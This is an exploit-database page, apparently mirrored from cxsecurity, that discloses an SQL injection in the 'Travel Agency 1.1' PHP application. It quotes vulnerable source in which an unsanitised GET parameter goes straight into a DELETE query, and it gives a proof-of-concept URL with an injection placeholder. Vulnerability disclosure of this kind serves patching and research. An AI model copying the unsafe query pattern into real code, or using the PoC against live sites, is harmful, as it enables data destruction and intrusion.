Advertisement






Travel Agency 1.1 SQL Injection

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2018-06-23
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018060249

Below is a copy:

Travel Agency 1.1 SQL Injection
# Exploit Title: Travel Agency 1.1 SQL Injection 
# Data: 06.23.2018
# Exploit Author: Ashkan Moghaddas
# Tested on: Windows - Linux
# Google Dork: N/A


=========
Vulnerable Page:
=========
/admin/add.city.php


==========
Vulnerable Source:
==========
Line20:if(isset($_GET['action']) && ($_GET['action'] == 'del')){
Line21:$delete = mysql_query("DELETE FROM destination where destination_id = '".$_GET['cid']."'");


=========
POC:
=========
http://site.com/admin/add.city.php?cid=[SQL]


============================
WebSite : UltraSec.Org
Channel : @UltraSecurity
Email : [email protected]



Special Thanks : Abolfaz Hajizadeh , MrQadir , Milad Ranjbar 

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum